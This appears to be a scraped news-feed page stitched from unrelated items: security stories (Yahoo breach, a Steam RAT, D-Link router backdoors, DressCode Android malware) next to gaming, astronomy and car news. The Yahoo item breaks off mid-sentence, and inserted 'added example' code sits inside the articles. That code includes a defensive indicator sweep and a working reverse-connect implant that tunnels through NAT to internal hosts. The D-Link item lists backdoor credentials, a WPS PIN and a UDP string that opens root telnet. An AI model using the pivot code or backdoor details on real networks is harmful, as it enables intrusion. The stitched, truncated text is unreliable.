News & Updates

The massive data breach that Yahoo! confirmed to the world last week, which exposed at least 500 million Yahoo user accounts, is claimed by the company to have been carried out by a “state-sponsored actor” in 2014.

But now it seems that Yahoo has downplayed a mega data breach and is trying to hide its own security blunder.

Recently the information security firm InfoArmor that analyzed


A malware researcher has spotted a Reddit user warning that hacked Steam accounts are being used to spread a Remote Access Trojan (RAT).

This week the malware researcher Lawrence Abrams found a worrisome message on Reddit. The Reddit user with the moniker Haydaddict was warning of the existence of compromised Steam accounts spreading a Remote Access Trojan (RAT).

“Quinn Lobdell hacked on Steam. Please be aware if others try to send you sketchy links. Scrub Killa and Jessie affected as well.” reads the post.

The compromised accounts were used to send chat messages containing links to a page where the recipient could supposedly watch a video.


“When the target went to the page, they would be greeted with a message stating that they needed to update Flash Player in order to watch the video.” explained Lawrence Abrams in a blog post.


The trick is quite simple and leverages the user’s curiosity: when the victim downloads and executes the fake Flash Player installer, apparently nothing happens, but in reality the machine has been opened up to the attacker.

The fake Flash Player installer executes a PowerShell script (zaga.ps1) that downloads a 7-Zip archive, the 7-Zip extractor, and a CMD script from a remote server (http://zahr[.]pw).

The PowerShell script then launches the CMD file, which extracts the sharchivedmngr archive into the %AppData%\lappclimtfldr folder and configures Windows to automatically start an instance of the NetSupport Manager Remote Control Software, renamed mcrtvclient.exe, when the victim logs in.

When the victim logs in to the infected machine, NetSupport Manager connects to the attacker’s NetSupport gateway and awaits commands; at this point the attacker has complete control over the victim’s machine.

“For those who are concerned they are infected with this Steam Trojan, I suggest they check the %AppData% folder for the specified folders.” suggests Lawrence Abrams in order to check if the system is compromised.
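The following indicator sweep is an added example, not code from the original post or from Lawrence Abrams. It turns the artefacts named above (the dropper zaga.ps1, the download host zahr[.]pw, the %AppData%\lappclimtfldr folder and the NetSupport client renamed mcrtvclient.exe) into checks that can be run on the suspect Windows host. The write-up does not say how the autostart is configured, so the Run/RunOnce registry keys and the Startup folder searched here are an assumption about the usual places to look, and the tasklist/ipconfig collection is a convenience of this example.

```python
"""Indicator sweep for the Steam "Flash Player" RAT (added example).

Indicators from the write-up: dropper zaga.ps1, download host zahr[.]pw,
staging folder lappclimtfldr under %AppData%, NetSupport client renamed to
mcrtvclient.exe. The autostart location is NOT given in the write-up; the
Run/RunOnce keys and the Startup folder below are an assumption.
"""
import os
import subprocess
import sys

STAGING_DIR = "lappclimtfldr"
CLIENT_EXE = "mcrtvclient.exe"
DROPPER = "zaga.ps1"
DOWNLOAD_HOST = "zahr.pw"

# Assumed persistence locations (not stated in the write-up).
RUN_KEYS = [
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Run"),
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
    ("HKLM", r"Software\Microsoft\Windows\CurrentVersion\Run"),
    ("HKLM", r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
]


def suspicious_autoruns(entries):
    """entries: (key, value_name, command) triples. Returns the entries whose
    command references the renamed client or the staging folder."""
    hits = []
    for key, name, cmd in entries:
        low = cmd.lower()
        if CLIENT_EXE in low or STAGING_DIR in low:
            hits.append(f"autorun {key}\\{name} -> {cmd}")
    return hits


def suspicious_paths(paths):
    """paths: file paths or bare image names (directory walk, Startup folder,
    process list). Flags the staging folder, anything inside it, the renamed
    client and the dropper script."""
    hits = []
    for p in paths:
        low = p.replace("/", "\\").lower()
        base = low.rsplit("\\", 1)[-1]
        in_staging = f"\\{STAGING_DIR}\\" in low or low.endswith("\\" + STAGING_DIR)
        if in_staging or base in (CLIENT_EXE, DROPPER):
            hits.append(f"file {p}")
    return hits


def suspicious_dns(names):
    """names: host names from the DNS client cache or a DNS/proxy log."""
    return [f"dns {n}" for n in names
            if n.lower() == DOWNLOAD_HOST or n.lower().endswith("." + DOWNLOAD_HOST)]


def _windows_autoruns():
    import winreg  # Windows only
    roots = {"HKCU": winreg.HKEY_CURRENT_USER, "HKLM": winreg.HKEY_LOCAL_MACHINE}
    for hive, sub in RUN_KEYS:
        try:
            key = winreg.OpenKey(roots[hive], sub)
        except OSError:
            continue
        with key:
            i = 0
            while True:
                try:
                    name, value, _ = winreg.EnumValue(key, i)
                except OSError:
                    break
                yield (f"{hive}\\{sub}", name, str(value))
                i += 1


def _windows_process_images():
    out = subprocess.run(["tasklist", "/fo", "csv", "/nh"],
                         capture_output=True, text=True, check=False).stdout
    return [line.split('","')[0].strip('"') for line in out.splitlines() if line.startswith('"')]


def _windows_dns_cache():
    out = subprocess.run(["ipconfig", "/displaydns"],
                         capture_output=True, text=True, check=False).stdout
    return [tok for tok in out.split() if tok.lower().endswith(DOWNLOAD_HOST)]


def scan():
    """Collect live data on the Windows host and return all findings."""
    if sys.platform != "win32":
        raise SystemExit("scan() must run on the Windows host being checked")
    appdata = os.environ["APPDATA"]
    staging = os.path.join(appdata, STAGING_DIR)
    paths = [staging] if os.path.isdir(staging) else []
    for root, _, files in os.walk(staging):
        paths += [os.path.join(root, f) for f in files]
    startup = os.path.join(appdata, r"Microsoft\Windows\Start Menu\Programs\Startup")
    if os.path.isdir(startup):
        paths += [os.path.join(startup, f) for f in os.listdir(startup)]
    paths += _windows_process_images()
    return (suspicious_paths(paths)
            + suspicious_autoruns(_windows_autoruns())
            + suspicious_dns(_windows_dns_cache()))


if __name__ == "__main__":
    found = scan()
    print("\n".join(found) if found else "no indicators of the Steam RAT found")
```

Run it as the logged-in user on the machine in question; an empty result only means these particular artefacts are absent, since a legitimate NetSupport installation will not match the renamed file name and the operator can change every one of these strings in a later campaign.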

Be careful every time you follow a link, and make sure you have up-to-date defense solutions installed.


Pierluigi Paganini

(Security Affairs – Hacked Steam accounts, malware)

The post Watch out, hacked Steam accounts used as an attack vector appeared first on Security Affairs.

Source: Security affairs

If you have a D-Link DWR-932 B LTE Wireless router you need to know that it is affected by more than 20 security issues, including backdoor accounts.

D-Link’s DWR-932 B LTE router and access point has been found to contain a number of backdoors as well as a default WPS (Wi-Fi Protected Setup) PIN.

Security researcher and blogger Pierre Kim has uncovered a number of security flaws in the device that affect even the latest version of its firmware.

Kim had previously disclosed a number of flaws in the LTE QDH routers made by Quanta, and it appears that they are present in the D-Link models as well.

Among the various vulnerabilities, the researcher found two backdoor accounts that can be used to bypass HTTP authentication: an admin account with the username and password ‘admin’, and a root account with the password ‘1234’.

The D-Link DWR-932 B also ships with a default WPS PIN, 28296607, hard-coded in the /bin/appmgr binary. The same PIN is also present in the HostAP and HTTP API configurations.

The /bin/appmgr program also lets an attacker send a specific string over UDP that forces the device to start a telnet service which operates without authentication. This works even if the telnet service isn’t already running: if the string HELODBC is sent to the router over UDP, the router allows unauthenticated access as root.

Both /etc/inadyn-mt.conf and /bin/qmiweb contain vulnerabilities: the configuration file holds a username with a hard-coded password, and the HTTP daemon in qmiweb has multiple exploitable routes.


Kim also discovered hard-coded user credentials for the FOTA (Firmware Over The Air) service in the /sbin/fotad binary. The daemon at least attempts to download firmware over HTTPS, but the SSL certificate for this service has been invalid for over 18 months.

It was also found that the UPnP daemon (miniupnpd) on the router runs with a lowered security level, allowing a LAN-based attacker to add port forwardings from the Internet to other local clients.

“There is no restriction about the UPnP permission rules in the configuration file, contrary to common usage in UPnP where it is advised to only allow redirection of port above 1024,” explained Kim.

This would allow attackers to forward traffic from the outside onto the local network, reaching services such as mail, file transfer, and databases, and giving Advanced Persistent Threats a large number of footholds.

Kim informed D-Link of the issues in the DWR-932 devices back in June of this year but to date has received no confirmation that they have been resolved. After 90 days of silence from D-Link, Kim chose to publish an advisory revealing the bugs.

D-Link patched a number of flaws in August after a vulnerability first found in one of its Wi-Fi cameras proved to be present in over 120 of its products, including a number of DIR-model routers.

Written by: Steven Boyd


Steven is a security consultant, researcher, ethical hacker and freelance writer with over 16 years of experience in the industry. He has provided security consultancy to some of the world’s biggest banks, the private sector as well as public services and defense. He is the owner and creator of security blog

Twitter: @CybrViews




Pierluigi Paganini

(Security Affairs – D-Link DWR-932, Hacking)

The post D-Link DWR-932 B LTE Wireless router affected by multiple backdoors appeared first on Security Affairs.

Source: Security affairs

(Image credit: Curious Expeditions)

Google Play was recently found to be hosting more than 400 apps that turned infected phones into listening posts that could siphon sensitive data out of the protected networks they connected to, security researchers said Thursday.

One malicious app infected with the so-called DressCode malware had been downloaded between 100,000 and 500,000 times before it was removed from the Google-hosted marketplace, Trend Micro researchers said in a post. Known as Mod GTA 5 for Minecraft PE, it was disguised as a benign game, but its code included a component that established a persistent connection with an attacker-controlled server. Through that connection the server could bypass the network address translation (NAT) protections that shield individual devices inside a network. Trend Micro has found 3,000 such apps in all, 400 of which were available through Play.

“This malware allows threat actors to infiltrate a user’s network environment,” Thursday’s report stated. “If an infected device connects to an enterprise network, the attacker can either bypass the NAT device to attack the internal server or download sensitive data using the infected device as a springboard.”
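The mechanism in that quote, an implant that dials out and is then used as a springboard into the network it sits on, is easy to misread as something NAT should prevent. The following added example (written for this page; it is not DressCode’s protocol, which the report does not describe, and not Trend Micro’s code) shows why it is not: the infected device makes an ordinary outbound connection, which NAT and egress filtering allow, and the operator then sends a connect instruction down that socket and relays traffic to an internal host the operator could never reach directly. The one-line `CONNECT host port` command, the use of 127.0.0.1 for all three parties and the 5-second timeouts are this example’s choices.

```python
"""Reverse-connect pivot through NAT (added example, not DressCode's protocol)."""
import socket
import threading

socket.setdefaulttimeout(5)  # keeps a broken run from hanging


def _relay(src, dst):
    """Copy bytes src -> dst until EOF, then pass the EOF on to dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _listener():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("127.0.0.1", 0))  # constructed: everything runs on loopback here
    s.listen(1)
    return s, s.getsockname()[1]


def start_internal_service():
    """Stand-in for a server on the victim's LAN that is not reachable from the
    Internet. Answers one request and exits. Returns its port."""
    srv, port = _listener()

    def serve():
        conn, _ = srv.accept()
        with conn:
            req = conn.recv(1024)
            conn.sendall(b"INTERNAL DATA for " + req)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def implant(c2_host, c2_port):
    """What the infected app does: connect OUT to the operator, wait for a
    'CONNECT host port' line, open that host on the LAN, relay both ways."""
    c2 = socket.create_connection((c2_host, c2_port))
    line = b""
    while not line.endswith(b"\n"):
        ch = c2.recv(1)
        if not ch:
            c2.close()
            return
        line += ch
    _, host, port = line.decode().split()
    target = socket.create_connection((host, int(port)))
    t = threading.Thread(target=_relay, args=(c2, target), daemon=True)
    t.start()
    _relay(target, c2)
    t.join()
    target.close()
    c2.close()


def operator_pivot(service_port):
    """Operator side: accept the implant's outbound connection, then tunnel a
    request through it to the internal service. Returns the service's reply."""
    c2_listener, c2_port = _listener()
    threading.Thread(target=implant, args=("127.0.0.1", c2_port), daemon=True).start()
    tunnel, _ = c2_listener.accept()
    c2_listener.close()
    with tunnel:
        tunnel.sendall(f"CONNECT 127.0.0.1 {service_port}\n".encode())
        tunnel.sendall(b"GET secret")
        tunnel.shutdown(socket.SHUT_WR)  # nothing more to send; wait for the reply
        reply = b""
        while True:
            chunk = tunnel.recv(4096)
            if not chunk:
                break
            reply += chunk
    return reply


def demo():
    return operator_pivot(start_internal_service())


if __name__ == "__main__":
    print(demo())
```

The defensive reading is the inverse of the attack: an inbound firewall rule never sees this traffic, so the signal to hunt for is a device holding a long-lived outbound connection that, from the inside, turns into connections to hosts and ports the device has no business talking to.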



Amazon has unveiled yet another add-on for its paying Prime subscribers, and it represents the company’s biggest tie-in yet with Twitch, the game-streaming service that Amazon acquired in 2014 for nearly $1 billion.

The new add-on, Twitch Prime, will dole out monthly gaming-related goodies to any Amazon Prime subscriber who links their shopping account with a Twitch user ID. Upon doing so, Twitch users will get a few Twitch-specific bonuses. The first is a series of free game downloads, which change every month and can range from full-game unlocks to DLC add-ons for games you already own (much like PlayStation Plus and Xbox Live Gold). Twitch Prime’s first month includes a full download of the Twitch-enabled multiplayer game Streamline and add-on bonuses for free-to-play games Hearthstone and Smite.

Twitch Prime appears to be enabled for Prime subscribers in the US, UK, Spain, Germany, France, Canada, and Italy.



(Image: The two stars of η Carinae are embedded in the nebula they’ve created. Credit: NASA, ESA, and the Hubble SM4 ERO Team)

“Even among Luminous Blue Variable [stars], η Car is unusual and its parameters are extreme.”

That bit of science-speak roughly translates to “Even among the largest, most energetic stars, Eta Carinae has done things we can’t explain, but find incredibly impressive.” The top item in η Carinae’s (η is the Greek letter eta) list of extreme behaviors involves producing a decades-long outburst that caused it to become the second-brightest star in the sky. This outburst released as much energy as a supernova and ejected many times the mass of the Sun. Yet somehow η Carinae remained intact.

Now, researchers have used a series of Hubble images to produce a timeline of the debris left behind by this enigmatic outburst. The new data reveals that this was just the latest in a series of eruptions, and we still can’t explain why they happen.



It says “Mini” but every generation gets bigger and bigger. (credit: Jim Resnick)

BMW confirmed to Bloomberg today that it will start work on an electric Mini and an electric X3 SUV. This news comes after reports of deliberation on BMW’s electric strategy among the company’s top executives earlier this month.

Chief Executive Officer Harald Krueger told Bloomberg that the all-electric Mini would be market-ready by 2019 and the X3 SUV would be a 2020 vehicle.

Reuters reported three weeks ago that BMW’s top executives had been resistant to the idea of building an electric Mini-brand car. Minis have a smaller profit margin than BMW-brand cars, they argued, and the investment costs of building an all-electric vehicle are considerable. A few executives felt that BMW should push ahead in the electric vehicle field, but after the weak US performance of the i3, other bigwigs were apparently not convinced that committing additional investment to purely electric cars would make financial sense.



(Image credit: Nintendo)

Aside from a hands-off display at New York Comic-Con, we haven’t seen or heard much about the upcoming, mini-sized NES Classic Edition since its first announcement in July. Now, new information is coming from Nintendo itself and from journalists at a recent hands-on preview event. They bring both good and bad news for retro Nintendo fans.

On the good side, the NES Mini apparently does have a few graphical options to play with. A recently updated promotional page now highlights three different visual modes: “pixel perfect” (i.e. square pixels), 4:3 (i.e. cathode ray tube ratio), and “CRT filter” (i.e. simulated scan lines on your HDTV). Nintendo also notes that you can create four “Suspend Points” for each of the 30 games on the system. You can lock any of those points so they don’t accidentally get saved over.

Hands-on reports from journalists also confirm what we first surmised from an earlier NES Classic Edition trailer: that the emulated graphics and colors on the NES Classic Edition’s 30 built-in games are much more faithful to the original games than Nintendo’s previous Virtual Console releases. Wired’s Chris Kohler notes that “the whites are sparkling white, and everything pops in bright color” on the new HDMI-powered system.
